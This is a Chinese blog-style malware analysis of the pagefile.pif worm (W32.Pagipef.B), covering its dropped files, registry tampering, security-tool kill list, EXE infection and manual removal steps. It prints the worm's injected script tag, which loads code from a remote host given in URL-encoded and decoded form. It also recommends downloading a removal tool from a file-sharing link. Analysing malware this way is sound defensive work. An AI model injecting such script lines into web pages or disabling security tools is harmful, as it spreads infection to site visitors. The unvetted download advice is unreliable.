pagefile.pif (W32.Pagipef.B)

昨天在别人电脑上抓的````一个pagefile.pif````
 
不记得自己写过没有``不过以前遇到过几次``好像是更新的版本`
 
`过7日的卡吧、瑞星、BD等``
 
这次更新的版本比较恶劣,怀疑是熊猫原码泄露```` :(
 
…………
 
Aditional Information
File size: 69632 bytes
MD5: 86ae07b7f81a35f268d11fe39a090a50
SHA1: a09329ed3d8b729372f01819b30c3004011e04ee
CRC32     : 84E8D7FA
RIPEMD160: 1C8C3977C66AF86DBC31D38BBD7A0CB4F10096B9
SHA160    : A09329ED3D8B729372F01819B30C3004011E04EE
packers: BINARYRES, FSG
Languages:Microsoft Visual C++ 6.0
 
运行,释放:
 
%Systemroot%\system32\Com\lsass.exe   69632 字节   (RHSA)
%Systemroot%\system32\Com\smss.exe   9261 字节
每个分区(C―F)下的Autorun.inf和pagefile.pif
 
貌似不支持U盘传播 =.=`(至少没跟踪到)
 
修改注册表:
 
 
(用了另类方法破坏“显示隐藏文件”功能)
 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
的ShowSuperHidden值修改为0(原本为1)
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden
的Type值写入乱码(原为checkbox)
 
假冒系统文件的lsass.exe 和smss.exe (路径为%Systemroot%\system32\Com\)``
 
使用双进程守护技术```
 
监视对方的存在和自身同党、注册表项等``如被修改或删除,则重写````
 
并尝试关闭下列关键字:
 
process
安全卫士    
asm
ida
进程    
卡巴    
瑞星    
毒霸    
杀毒    
江民    
softice
virus   
symantec    
avp
regedit
kaka
 
汗``连反汇编工具都不放过`````!
 
后遍历磁盘,查找扩展名为jsp php spx asp tml htm的,插入一段代码:
 
<script src=" h**p://%78%77%2E%6D%6F%76%37%38%2E%63%6F%6D/%62%32%2E%61%73%70"></script>
 
解密后得:
 
h**p://xw.mov78.com/b2.asp
 
由于时间关闭,并未光临该网站,我猜一定有很多好玩的东西````
 
最后还感染了除系统盘和Windows目录的所有EXE文件``从D盘开始`````
 
感染方式为捆绑``多了2个MZ头,应该是那2个狼狈为**假冒系统文件的东东吧``
 
没有深入跟踪```自己也不清楚````` :Q
 
 
解决方法:
 
 
 
[url]http://gudugengkekao.ys168.com/[/url]下载:
PowerRmv.com 101KB
 
下不了的,自己去网上找````
 
放到桌面,关闭不需要的进程```断开网络``
 
打开PowerRmv,选上“抑制对象生成”,填入(一次一个,后面不要有空格):
 
C:\Windows\system32\Com\lsass.exe
C:\Windows\system32\Com\smss.exe
C:\AUTORUN.INF
C:\pagefile.pif
D:\AUTORUN.INF
D:\pagefile.pif
E:\AUTORUN.INF
E:\pagefile.pif
F:\AUTORUN.INF
F:\pagefile.pif
 
打开注册表,把上面提到的键值改回来```ShowSuperHidden和Type值```
 
然后升级杀软,全盘扫``修复被感染的EXE文件```
 
(捆绑方式的,修复成功率应该很高吧?。。。)
 
 
PP:


图片点击可在新窗口打开查看


图片点击可在新窗口打开查看


图片点击可在新窗口打开查看


图片点击可在新窗口打开查看

你可能感兴趣的:(职场,休闲,pagefile.pif,W32.Pagipef.B)